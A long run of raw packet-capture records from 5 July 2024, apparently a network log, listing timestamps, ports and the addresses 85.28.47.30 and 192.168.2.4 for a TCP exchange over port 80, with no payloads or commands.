                                                                Jul 5, 2024 04:36:04.782196045 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782232046 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.782254934 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.782351017 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782370090 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782382965 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782393932 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782394886 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.782406092 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782411098 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.782418966 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782424927 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.782432079 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782443047 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782454014 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782453060 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.782466888 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782478094 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782479048 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.782506943 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782506943 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.782519102 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782524109 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.782531023 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782541990 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782546997 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.782552958 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782565117 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782574892 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782579899 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.782603979 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.782603979 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.782654047 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782665014 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782674074 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782684088 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782695055 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782696009 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.782706022 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782715082 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.782718897 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782736063 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.782749891 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.782757998 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782769918 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782773018 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.782779932 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782792091 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782799006 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.782803059 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782812119 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.782816887 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782828093 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782834053 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.782835960 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782850027 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782859087 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.782860041 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782871962 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.782882929 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.782902002 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.782921076 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.783088923 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783099890 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783108950 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783118963 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783129930 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783132076 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.783139944 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783152103 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.783153057 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783169031 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783175945 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.783179998 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783190012 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.783193111 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783205032 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.783206940 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783216953 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783225060 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783230066 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.783253908 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.783269882 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.783433914 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783444881 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783453941 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783463955 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783474922 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783484936 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783484936 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.783497095 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783509016 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783509016 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.783520937 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783529043 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.783533096 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783536911 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.783544064 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783555984 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783556938 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.783570051 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783580065 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.783587933 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783593893 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.783600092 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783610106 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783617973 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.783623934 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783632994 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783642054 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.783642054 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783658028 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783667088 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783669949 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.783679008 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783684015 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.783689976 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783703089 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783710957 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.783714056 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783725977 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783735037 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.783736944 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783747911 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783747911 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.783760071 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783765078 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.783772945 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783782005 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783790112 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783791065 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.783802032 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783814907 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.783818960 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.783835888 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.783849001 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.784012079 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784023046 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784033060 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784044027 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784060955 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.784087896 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.784149885 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784162998 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784172058 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784182072 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784193039 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.784193039 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784209013 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784219980 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784220934 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.784229994 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784243107 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784244061 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.784252882 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784262896 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784271955 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784272909 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.784287930 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.784292936 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784305096 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784313917 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784324884 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.784324884 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784337997 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784339905 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.784349918 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784358025 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.784360886 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784372091 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.784373999 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784385920 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784395933 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784399986 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.784411907 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784425974 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.784429073 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784439087 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.784440994 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784452915 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784465075 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784468889 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.784476995 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784495115 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784502029 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.784506083 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784518003 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784528971 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784538031 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.784538984 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784544945 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.784550905 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784560919 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784570932 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784578085 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.784584045 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784595013 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.784595966 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.784611940 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.784636974 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.785129070 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.785140991 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.785151005 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.785161972 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.785171986 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.785180092 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.785182953 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.785195112 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.785200119 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.785207987 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.785209894 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.785218000 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.785235882 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.785240889 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.785247087 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.785258055 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.785264969 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.785269022 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.785279989 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.785289049 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.785300016 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.785300016 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.785311937 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.785322905 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.785325050 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.785336018 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.785337925 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.785346985 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.785358906 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.785363913 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.785370111 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.785372019 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.785381079 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.785393000 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.785398006 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.785404921 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.785414934 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.785424948 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.785424948 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.785440922 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.785463095 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.817606926 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.817617893 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.817629099 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.817670107 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.817681074 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.817686081 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.817699909 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.817709923 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.817720890 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.817723036 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.817743063 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.817749977 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.817760944 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.817765951 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.817770004 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.817794085 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.817811966 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.817837000 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.817878962 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.817888975 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.817898989 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.817939043 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.826953888 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.826982975 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.826992989 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.827012062 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.827039003 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.827043056 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.827054977 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.827066898 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.827078104 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.827084064 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.827096939 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.827115059 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.827136040 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.827142000 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.827191114 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.827219009 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.827230930 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.827270985 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.827272892 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.827297926 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.827308893 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.827321053 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.827344894 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.827385902 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.827402115 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.827414989 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.827435017 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.827461004 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.827461004 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.827475071 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.827507019 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.827533007 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.827553034 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.827564955 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.827577114 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.827591896 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.827604055 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.827606916 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.827637911 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.827671051 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.827773094 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.827824116 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.827896118 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.827908039 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.827927113 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.827939034 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.827946901 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.827965975 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.827969074 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.827979088 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.827990055 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.827999115 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.828002930 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.828016043 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.828026056 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.828047991 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.828063965 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.828073025 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.828077078 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.828085899 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.828092098 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.828120947 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.828150034 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.828231096 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.828282118 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.828299046 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.828310966 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.828321934 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.828351021 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.828370094 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.828387976 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.828399897 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.828412056 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.828422070 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.828433990 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.828448057 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.828468084 CEST4973080192.168.2.485.28.47.30
